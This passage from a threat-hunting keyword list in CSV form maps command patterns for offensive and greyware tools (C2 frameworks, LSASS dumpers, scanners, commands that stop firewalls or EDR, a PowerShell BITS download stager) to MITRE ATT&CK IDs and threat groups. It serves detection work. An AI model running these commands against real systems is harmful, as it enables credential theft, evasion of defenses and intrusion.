TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"load *.cna","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations 
are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"make_token *","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"make_token *","offensive_tool_keyword","cobaltstrike","A basic implementation of abusing the SeBackupPrivilege via Remote Registry dumping to dump the remote SAM SECURITY AND SYSTEM hives.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - 
T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/m57/cobaltstrike_bofs","1","0","N/A","10","10","153","25","2022-07-23T20:37:52Z","2020-07-30T22:36:51Z" +"masscan *","offensive_tool_keyword","masscan","TCP port scanner. spews SYN packets asynchronously. 
scanning entire Internet in under 5 minutes.","T1046","TA0007","N/A","N/A","Reconnaissance","https://github.com/robertdavidgraham/masscan","1","0","N/A","N/A","10","21688","2980","2023-08-09T13:28:54Z","2013-07-28T05:35:33Z" +"memdump *","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"memex /*.exe*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"memhunt *","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"na.exe *","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - 
T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","0","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z" +"nanodump*","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1467","208","2023-09-04T01:25:27Z","2021-11-10T18:28:15Z" +"nc -vz *","greyware_tool_keyword","netcat","Netcat is a featured networking utility which reads and writes data across network connections. using the TCP/IP protocol It is designed to be a reliable back-end tool that can be used directly or easily driven by other programs and scripts. At the same time. it is a feature-rich network debugging and exploration tool. since it can create almost any kind of connection you would need and has several interesting built-in capabilities","T1043 - T1052 - T1071 - T1095 - T1132 - T1573","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","POST Exploitation tools","http://netcat.sourceforge.net/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"needle_sift *","offensive_tool_keyword","cobaltstrike","Strstr with user-supplied needle and filename as a BOF.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - 
T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Needle_Sift_BOF","1","0","N/A","10","10","30","7","2021-09-27T22:57:33Z","2021-09-27T20:13:10Z" +"net.recon *","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","0","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"nikto -*","offensive_tool_keyword","nikto","Nikto web server scanner","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/sullo/nikto","1","1","N/A","N/A","10","7136","1096","2023-09-18T14:44:28Z","2012-11-24T04:24:29Z" +"nimplant","offensive_tool_keyword","nimplant","user agent default field - A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"nimplant *","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"nmap *","greyware_tool_keyword","nmap","A very common tool. 
Network host vuln and port detector.","T1046 - T1065 - T1202 - T1210.002","TA0002 - TA0007 - TA0008","N/A","N/A","Information Gathering","https://github.com/nmap/nmap","1","0","greyware tool - risks of False positive !","N/A","10","8301","2206","2023-09-29T08:27:35Z","2012-03-09T14:47:43Z" +"noclient-3.*","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file noclient CNC server for NOPEN*","T1053 - T1064 - T1059 - T1218","TA0002 - TA0007","N/A","N/A","Shell spawning","https://github.com/x0rz/EQGRP/blob/master/Linux/bin/noclient-3.3.2.3-linux-i386","1","0","N/A","N/A","10","4011","2166","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z" +"onex install *","offensive_tool_keyword","onex","Onex is a package manager for hacker's. Onex manage more than 400+ hacking tools that can be installed on single click","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/rajkumardusad/onex","1","0","N/A","N/A",,"N/A",,, +"polenum *:*","offensive_tool_keyword","polenum","Uses Impacket Library to get the password policy from a windows machine","T1012 - T1596","TA0009 - TA0007","N/A","N/A","Discovery","https://salsa.debian.org/pkg-security-team/polenum","1","0","N/A","8","10","N/A","N/A","N/A","N/A" +"posh -u *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"powerpick 
*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"powershell.exe -nop -c ""start-job *Import-Module BitsTransfer*$env:temp*GetRandomFileName()*Start-BitsTransfer -Source 'http*Remove-Item*Receive-Job*","offensive_tool_keyword","powershell","deployment of a payload through a PowerShell stager using bits to download","T1197","TA0009","N/A","N/A","Collection","https://thedfirreport.com/2023/09/25/from-screenconnect-to-hive-ransomware-in-61-hours/","1","0","N/A","8","10","N/A","N/A","N/A","N/A" +"ps_ex *","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"psenum *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"psgrep *","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"psinject","offensive_tool_keyword","empire","Empire commands. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. 
While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1155","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"pupysh","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"python3 start_campaign.py","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - TA0040","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","0","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" +"raw_keylogger *","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1056-001 - T1056-002 - T1056-003 - T1056-004 - T1056-005 - T1003 - T1113 - T1213","TA0006 - TA0009","N/A","N/A","Collection - Credential Access - Exfiltration","https://github.com/trustedsec/SliverKeylogger","1","0","N/A","N/A","2","127","38","2023-09-22T19:39:04Z","2022-06-17T19:32:53Z" +"rawshark -*","greyware_tool_keyword","wireshark","Wireshark is a network protocol analyzer.","T1040 - T1052.001 - T1046","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://www.wireshark.org/","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"rcat listen *","offensive_tool_keyword","rustcat","Rustcat(rcat) - The modern Port listener and Reverse shell","T1090.001 - T1090.002 - T1046","TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/robiot/rustcat","1","0","N/A","10","10","574","56","2023-10-02T11:32:12Z","2021-06-04T17:03:47Z" +"RedGuard 
-*","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/wikiZ/RedGuard","1","0","N/A","10","10","1098","170","2023-09-19T11:06:40Z","2022-05-08T04:02:33Z" +"remotereg *","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - 
TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/pwn1sher/CS-BOFs","1","0","N/A","10","10","100","23","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z" +"rev2self*","offensive_tool_keyword","cobaltstrike","Spectrum Attack Simulation beacons","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nccgroup/nccfsas/","1","0","N/A","10","10","594","117","2022-08-05T16:25:42Z","2020-06-25T09:33:45Z" +"rpcclient -*","greyware_tool_keyword","rpcclient","tool for executing client side MS-RPC functions","T1021.006 - T1049","TA0002 - TA0009","N/A","N/A","Lateral movement","https://www.samba.org/samba/docs/current/man-html/rpcclient.1.html","1","0","greyware tool - risks of False positive !","8","10","N/A","N/A","N/A","N/A" +"runof 
*.o*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"runpe *.exe*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"samdump *","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"ScareCrow -*","offensive_tool_keyword","ScareCrow","ScareCrow - Payload 
creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","0","N/A","N/A","10","2581","459","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" +"schkconfig off cbdaemon","greyware_tool_keyword","shell","Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes* deleting Registry keys so that tools do not start at run time* or other methods to interfere with security tools scanning or reporting information.","T1055 - T1070.004 - T1218.011","TA0007 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://attack.mitre.org/techniques/T1562/001/","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"scrun.exe *","offensive_tool_keyword","cobaltstrike","BypassAV ShellCode Loader (Cobaltstrike/Metasploit)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/k8gege/scrun","1","0","N/A","10","10","177","76","2019-07-27T07:10:08Z","2019-07-21T15:34:41Z" +"service cbdaemon stop","greyware_tool_keyword","shell","Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes* deleting Registry keys so that tools do not start at run time* or other methods to interfere with security tools scanning or reporting information.","T1055 - T1070.004 - T1218.011","TA0007 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://attack.mitre.org/techniques/T1562/001/","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"service ip6tables stop","greyware_tool_keyword","iptables","Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes* deleting Registry keys so that tools do not start at run time* or other methods to interfere with security tools scanning or reporting information.","T1055 - T1070.004 - T1218.011","TA0007 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://attack.mitre.org/techniques/T1562/001/","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"service iptables stop","greyware_tool_keyword","iptables","Adversaries may disable security tools to avoid possible detection of their tools and activities. 
This can take the form of killing security software or event logging processes* deleting Registry keys so that tools do not start at run time* or other methods to interfere with security tools scanning or reporting information.","T1055 - T1070.004 - T1218.011","TA0007 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://attack.mitre.org/techniques/T1562/001/","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"set CMD *","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","0","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"set ENDPOINT *","offensive_tool_keyword","koadic","Koadic. or COM Command & 